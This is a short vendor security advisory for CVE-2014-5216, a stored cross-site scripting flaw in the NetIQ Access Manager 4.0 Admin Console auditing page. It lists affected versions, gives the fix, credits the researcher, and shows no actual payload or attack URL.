Persistent Site Scripting (XSS) attack used against Admin Console to inject a stored script on the auditing page - CVE-2014-5216

  • 7015996
  • 15-Dec-2014
  • 17-Dec-2014


NetIQ Access Manager 4.0
NetIQ Access Manager 4.0 Admin Console
NetIQ Access Manager 4.0 Support Pack 1 HF2 applied


The following URL sent to the Access Manager Admin Console Server uses persistent site scripting (XSS) to inject a stored script on the auditing page:


As soon as you do this and go to the Auditing page on iManager, an XSS script will be launched.


Apply 4.0.1 HF3 or greater to address the issue.

Additional Information

NetIQ thanks Wolfgang Ettlinger (discovery, analysis, coordination) from the SEC Consult Vulnerability Lab ( for responsibly reporting the identified issues and working with us as we addressed them.